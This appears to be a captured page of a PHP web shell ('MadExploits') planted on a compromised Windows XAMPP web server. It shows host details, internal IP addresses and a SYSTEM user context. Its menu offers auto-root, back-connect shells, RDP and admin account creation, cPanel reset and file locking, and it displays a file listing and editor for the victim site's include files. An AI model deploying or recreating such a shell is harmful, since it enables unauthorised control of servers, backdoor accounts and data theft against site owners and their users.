Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
bak.sql
0
B
-rw-rw-rw-
config.php
6.25
KB
-rw-rw-rw-
external.json
81
B
-rw-rw-rw-
f_start.php
3.26
KB
-rw-rw-rw-
page_footer.php
220
B
-rw-rw-rw-
page_head.php
3.43
KB
-rw-rw-rw-
page_header.php
4.78
KB
-rw-rw-rw-
page_header_200423.php
3.23
KB
-rw-rw-rw-
page_header_230312.php
4.27
KB
-rw-rw-rw-
page_sidebar.php
17.64
KB
-rw-rw-rw-
page_sidebar_alt.php
3.94
KB
-rw-rw-rw-
template_end.php
1.46
KB
-rw-rw-rw-
template_scripts.php
1.43
KB
-rw-rw-rw-
template_scripts_200430.php
657
B
-rw-rw-rw-
template_scripts_notinclude.ph...
2.68
KB
-rw-rw-rw-
template_start.php
16.75
KB
-rw-rw-rw-
template_start_200728.php
8.67
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template_scripts.php
<?php /** * template_scripts.php * * Author: pixelcave * * All vital JS scripts are included here * */ ?> <script type="text/javascript"> var doc_allowed1 = <?php echo json_encode($conf_doctype1);?>; var doc_allowed2 = "<?php echo substr($conf_doctype2,0,-1);?>"; var conf_fullweblink = "<?php echo $conf_fullweblink;?>"; const doc_maxsize1 = Number("<?php echo $conf_maxuploadsize;?>"); const conf_pass_digit = <?php echo $conf_pass_digit;?>; const conf_pass_symbol = <?php echo $conf_pass_symbol;?>; const conf_pass_upcase = <?php echo $conf_pass_upcase;?>; const conf_pass_locase = <?php echo $conf_pass_locase;?>; </script> <!-- Include Jquery library from Google's CDN but if something goes wrong get Jquery from local file (Remove 'http:' if you have SSL) --> <script>!window.jQuery && document.write(decodeURI('%3Cscript src="js/vendor/jquery-2.1.1.min.js"%3E%3C/script%3E'));</script> <!-- Bootstrap.js, Jquery plugins and Custom JS code --> <script src="js/vendor/bootstrap.min.js"></script> <script src="js/plugins.js"></script> <script src="js/app.js"></script> <script src="extension/jquery-confirm-v3.3.4/js/jquery-confirm.js"></script> <link rel="stylesheet" href="extension/jquery-confirm-v3.3.4/css/jquery-confirm.css"> <script src="js/jquery-1.8.13-ui-custom.js"></script> <script src="js/isotope.pkgd.min.js"></script> <script src="js/smartresize.js"></script> <link rel="stylesheet" type="text/css" href="js/jquery-ui-custom.css" />
Close